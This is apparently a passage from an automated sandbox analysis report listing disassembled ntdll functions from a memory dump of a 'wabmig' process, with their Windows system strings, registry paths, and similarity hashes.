              • HEAP: , xrefs: 21971596
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              • Opcode ID: 835e184cf6cd49b3679caa33864af0ecd93b3043f128f97bf1407a4ebc7c057c
              • Instruction ID: 03e79c9c9727df2ca9d4562c068914531795573c174a68c8fb9c0175520e1b7e
              • Opcode Fuzzy Hash: 835e184cf6cd49b3679caa33864af0ecd93b3043f128f97bf1407a4ebc7c057c
              • Instruction Fuzzy Hash: 01E1E3B0A046459FD719CF28C491B7ABBF9EF49700F1484ADE5DACB24AD734E942CB50
              Function 2196A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: FilterFullPath$UseFilter$\??\
              • API String ID: 0-2779062949
              • Opcode ID: bddc02b6c021d6c8d936f55c8adfeedfe1fadd6dbd35532c9d61cf7c289e88ab
              • Instruction ID: 628fbb8d5f7c796a52b7baff450cb5efd9dcb6f8ae35e2b33bfac4d9402cba7f
              • Opcode Fuzzy Hash: bddc02b6c021d6c8d936f55c8adfeedfe1fadd6dbd35532c9d61cf7c289e88ab
              • Instruction Fuzzy Hash: 3DA15A7191162D9BDB21DF64CC88B9ABBB8EF49B10F1041E9E90CA7260D735AF84CF51
              Function 2197B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
              • API String ID: 0-373624363
              • Opcode ID: e581623a18a67c409a4f856abe9d39b28a70704c9ccd1a2312695c6319f70eb3
              • Instruction ID: 9d01fe215c86aa2eaed49e56dc959af1b236bff6f540d9bc427f9aa17032488d
              • Opcode Fuzzy Hash: e581623a18a67c409a4f856abe9d39b28a70704c9ccd1a2312695c6319f70eb3
              • Instruction Fuzzy Hash: 5E91E3F2A04609CFEB21CF54C440BDE77B8FF02765F1181D9E91AAB290D3789A42CB91
              Function 219A909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: %$&$@
              • API String ID: 0-1537733988
              • Opcode ID: f458196b39293ebf0ba3a534df5f5333a8ae1881e47bdb591a9933c833fde631
              • Instruction ID: 99f3efbccc5c2d0b7c067f76c13adf4b334d60d7b86dde3b51fc94feb3fa1b61
              • Opcode Fuzzy Hash: f458196b39293ebf0ba3a534df5f5333a8ae1881e47bdb591a9933c833fde631
              • Instruction Fuzzy Hash: CE71E1706083429FD705CF24C584A5BBBE9FF8A718F108A5EE99D87251C731E90ACB92
              Function 2196F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
              Download Yara Rule
              Strings
              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 219CE6C6
              • HEAP[%wZ]: , xrefs: 219CE6A6
              • HEAP: , xrefs: 219CE6B3
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
              • API String ID: 0-1340214556
              • Opcode ID: 1f6e516b8964c6d6a7d4910a0c7a66e063bf9064cb2340e83c8e0938b6e74321
              • Instruction ID: 650d7abe575450058157cefa02a2e7671d0699426357e3a0ab0e7ae6452e2ab9
              • Opcode Fuzzy Hash: 1f6e516b8964c6d6a7d4910a0c7a66e063bf9064cb2340e83c8e0938b6e74321
              • Instruction Fuzzy Hash: EE51C631600A85EFE712CBA8C994F9ABFFCEF05704F1440E5E58A87692D774EA40CB61
              Function 219915F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
              Download Yara Rule
              Strings
              • Could not validate the crypto signature for DLL %wZ, xrefs: 219DA589
              • minkernel\ntdll\ldrmap.c, xrefs: 219DA59A
              • LdrpCompleteMapModule, xrefs: 219DA590
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1676968949
              • Opcode ID: 2e79f9a15f6a0fd45e48ee82e6b6b0362552642c17a531d702eda9a97ca9521a
              • Instruction ID: 6819191f1bde4edf2018597dfe9d32f916ac5211fd98c9218c01430a639a436b
              • Opcode Fuzzy Hash: 2e79f9a15f6a0fd45e48ee82e6b6b0362552642c17a531d702eda9a97ca9521a
              • Instruction Fuzzy Hash: 59512371A007459FE712CF18C944F0A7BFCBF41764F1846A9EA689B6E2D774E900CB80
              Function 2196758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
              • API String ID: 0-1151232445
              • Opcode ID: 44ec5c02173aada5d8ed4a9154d6d0f48e5363e27749cf7d8430281c9bb15635
              • Instruction ID: 88937c6d174ed68ec02e8562d3b4ed4021c245d31268a3d27223731e1d343443
              • Opcode Fuzzy Hash: 44ec5c02173aada5d8ed4a9154d6d0f48e5363e27749cf7d8430281c9bb15635
              • Instruction Fuzzy Hash: 504114702002C28FFB1ACE18C190BA97BEC9F07755F1440ADD58D8B296E676D986C763
              Function 21A2C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
              Download Yara Rule
              Strings
              • PreferredUILanguages, xrefs: 21A2C212
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 21A2C1C5
              • @, xrefs: 21A2C1F1
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
              • API String ID: 0-2968386058
              • Opcode ID: 68da02701566a8f54fece7178fe2743966b45f8cd187df296968fb8a55512e3c
              • Instruction ID: 78e83cc9e798a2ac0b46dfa7ca5361758298291ac7290da711d5713df14ad8ec
              • Opcode Fuzzy Hash: 68da02701566a8f54fece7178fe2743966b45f8cd187df296968fb8a55512e3c
              • Instruction Fuzzy Hash: 06415E72D0061EAFEB01DBD4CC81FDEBBBDBB16700F10406AEA09A7284DB759A448B50
              Function 21A04144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
              • API String ID: 0-1373925480
              • Opcode ID: 8909f9c66b544d58a2c93547ff5a2d895a8719594242d894f2429b5c259d457b
              • Instruction ID: 423664cce8ddc58238ed159c32b20a57a7523a2acc84fe003bd6f09b42c9c49d
              • Opcode Fuzzy Hash: 8909f9c66b544d58a2c93547ff5a2d895a8719594242d894f2429b5c259d457b
              • Instruction Fuzzy Hash: 43411272A047498FEB12CFE5E840B9DBBB8FF5A340F15046AD904EB791E7359A01CB51
              Function 219A33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
              Download Yara Rule
              Strings
              • RtlCreateActivationContext, xrefs: 219E29F9
              • Actx , xrefs: 219A33AC
              • SXS: %s() passed the empty activation context data, xrefs: 219E29FE
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
              • API String ID: 0-859632880
              • Opcode ID: b6d8c32095a4b4e22990ce495cba31d9d82acb38bac0b72f2f9e3da011ab762e
              • Instruction ID: 2904d2b5dd665e77a7a2ecc772962015c9213608651803d56daa48bb54d12742
              • Opcode Fuzzy Hash: b6d8c32095a4b4e22990ce495cba31d9d82acb38bac0b72f2f9e3da011ab762e
              • Instruction Fuzzy Hash: 2131F437600205AFEB16CF59C884F977BE9BB49B11F1144AAED0C9F286CB30EA45C790
              Function 219FB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
              Download Yara Rule
              Strings
              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 219FB632
              • @, xrefs: 219FB670
              • GlobalFlag, xrefs: 219FB68F
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
              • API String ID: 0-4192008846
              • Opcode ID: 3450d4eeda87dedb74f35d85bc04ba2f141c1f9fe32051ab849cf021f210e0dc
              • Instruction ID: 1e33d1df1f09c0fa6cdbfbbbb3f5aead3e6113ec830178075c4c5fd9e12f24e0
              • Opcode Fuzzy Hash: 3450d4eeda87dedb74f35d85bc04ba2f141c1f9fe32051ab849cf021f210e0dc
              • Instruction Fuzzy Hash: 5A3119B1A00219BEEB10DF95CC90AEEBBBCEF45754F1004A9E609B7150D7749A44CBA4
              Function 219B1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
              Download Yara Rule
              Strings
              • @, xrefs: 219B12A5
              • BuildLabEx, xrefs: 219B130F
              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 219B127B
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 0-3051831665
              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
              • Instruction ID: cb068706f62878278b72a61f320a6e07fd9bb197180c00c44a67154b02cd888c
              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
              • Instruction Fuzzy Hash: D5315E7290151ABFDF12DF95DC44E9EBBBDEB95750F004425E918A7160E730DA058B50
              Function 219F20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
              Download Yara Rule
              Strings
              • LdrpInitializationFailure, xrefs: 219F20FA
              • Process initialization failed with status 0x%08lx, xrefs: 219F20F3
              • minkernel\ntdll\ldrinit.c, xrefs: 219F2104
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2986994758
              • Opcode ID: f63ad35e741bbd7e89164c3041d88b0817add59aa76889ef31ecfa1b231dce26
              • Instruction ID: 71c510be27f74fec94a6b9a847b5a231f83366f39ab7663ca5c02b1daad28c1c
              • Opcode Fuzzy Hash: f63ad35e741bbd7e89164c3041d88b0817add59aa76889ef31ecfa1b231dce26
              • Instruction Fuzzy Hash: 1FF0C879640248BFE710DA48CC52F9A376CFB51754F100059F70C77281D2B4A501C795
              Function 219803E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: #%u
              • API String ID: 48624451-232158463
              • Opcode ID: 78cfbfa4a7b024740f7377e2d52f1a67429ab3e019f0697c2589463ca3ac5c6e
              • Instruction ID: dcb90051479108a10ffecbf517c1aa2987504e563204583227eb4af5ae0863f7
              • Opcode Fuzzy Hash: 78cfbfa4a7b024740f7377e2d52f1a67429ab3e019f0697c2589463ca3ac5c6e
              • Instruction Fuzzy Hash: D9714B72A0114A9FDB05DFA8C990FAEB7F8AF19704F154165E909E7251EB34EE01CB60
              Function 219852A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@
              • API String ID: 0-149943524
              • Opcode ID: 60f3dadaf0edfdb60666b716b9c50905c36fdca2284cacc11d83f8997f81efd3
              • Instruction ID: 6854172b82d4c82d1d15fc8eac56bb625033ffd6861daccb27990d711044a5ec
              • Opcode Fuzzy Hash: 60f3dadaf0edfdb60666b716b9c50905c36fdca2284cacc11d83f8997f81efd3
              • Instruction Fuzzy Hash: 2932B2755083118FE714CF14C480B6FBBEAEF86745F12895EFA8997290E734D948CB92
              Function 21A3A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: `$`
              • API String ID: 0-197956300
              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
              • Instruction ID: 0ed098f6999026848eadaa9b3cd0b8a28939f7e82e07eb98e5d948a2ddc7a04e
              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
              • Instruction Fuzzy Hash: 76C1EE312043529FE715CF24C841B6BBBE5BFD5318F044A2CF69ACA291D775D905CB82
              Function 219704E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
              Download Yara Rule
              Strings
              • kLsE, xrefs: 21970540
              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2197063D
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
              • API String ID: 0-2547482624
              • Opcode ID: aeed1ea5901ae04da602bc140a6d5bd637ca008dbce208937613369e0446c399
              • Instruction ID: ceb220fb911a0b0632a8f00a88cf8d774656db3ec87acd38dc2ffa355f6bad62
              • Opcode Fuzzy Hash: aeed1ea5901ae04da602bc140a6d5bd637ca008dbce208937613369e0446c399
              • Instruction Fuzzy Hash: BE51CDB15007428FD314DF25C490697BBF8AF86305F18897EEAAE87241E734E646CB92
              Function 2197A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
              Download Yara Rule
              Strings
              • RtlpResUltimateFallbackInfo Enter, xrefs: 2197A2FB
              • RtlpResUltimateFallbackInfo Exit, xrefs: 2197A309
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
              • API String ID: 0-2876891731
              • Opcode ID: 8ec79e6712cd503b3eaa969a22d6c73b672ffc9723d09ba5dd6fb495856ced81
              • Instruction ID: 10565781140e029774dc6e38c4daea8d9122102fb972f45f0702cb57e2153c06
              • Opcode Fuzzy Hash: 8ec79e6712cd503b3eaa969a22d6c73b672ffc9723d09ba5dd6fb495856ced81
              • Instruction Fuzzy Hash: BF41D1B1A04649DFEB05DF59C840F6E7BB8FF86701F1480A9E918DB291E3B9DA01CB50
              Function 21A035BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
              • API String ID: 0-118005554
              • Opcode ID: f2c6a712aaf284ecadf61c9ce821d3daf41dd45d43a81b283e53fd9af5d533ee
              • Instruction ID: 969e5fba1fa4e8065dc6a5c518a4e5a0b713cdbd57c52bebdaf368dc423c639b
              • Opcode Fuzzy Hash: f2c6a712aaf284ecadf61c9ce821d3daf41dd45d43a81b283e53fd9af5d533ee
              • Instruction Fuzzy Hash: 40318D326097429FE301CF69E854B1BBBE8EF96750F05086DF9588B390EB74D905CB92
              Function 219A329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: .Local\$@
              • API String ID: 0-380025441
              • Opcode ID: f036950bbfeb3406fafd44d43205641163c9e1a1c93e22e14ff284bd247518e8
              • Instruction ID: 6e4e022893a783a8408aae0dcadc34666a79d16d56ebacf74e994bf76c201499
              • Opcode Fuzzy Hash: f036950bbfeb3406fafd44d43205641163c9e1a1c93e22e14ff284bd247518e8
              • Instruction Fuzzy Hash: AE317EB250D3059FD311CF29C880E5BBBE8EB95694F80096EF99883350DB35DE08CB92
              Function 219A34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
              Download Yara Rule
              Strings
              • RtlpInitializeAssemblyStorageMap, xrefs: 219E2A90
              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 219E2A95
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
              • API String ID: 0-2653619699
              • Opcode ID: 1fda266774ebfc45dd72f41ef4c237c7d6285d69c4a55fc9220c9ae50c75a473
              • Instruction ID: 562bf4fd1f98b443dbb8bb789f6d620448dd60beb33387e88ae8e011c85b63ae
              • Opcode Fuzzy Hash: 1fda266774ebfc45dd72f41ef4c237c7d6285d69c4a55fc9220c9ae50c75a473
              • Instruction Fuzzy Hash: 8B112976B01205BBF72ACE48CD45F5B76EDDB95F54F14806EBA0CEB284D674CE0486A0
              Function 219AA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: Cleanup Group$Threadpool!
              • API String ID: 2994545307-4008356553
              • Opcode ID: f992d6599e01bbdd759dd28fd1ac25290544219d8e90591adaab0d46a8aa63eb
              • Instruction ID: 1a88c2d9de865673a93b5dd251639ba453524d0b7818f02b3b4889acbb1061e3
              • Opcode Fuzzy Hash: f992d6599e01bbdd759dd28fd1ac25290544219d8e90591adaab0d46a8aa63eb
              • Instruction Fuzzy Hash: C30122B6540744AFE311CF28CE45F16B7E8E794729F008939B65CC71A0E334E808CB86
              Function 21977370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
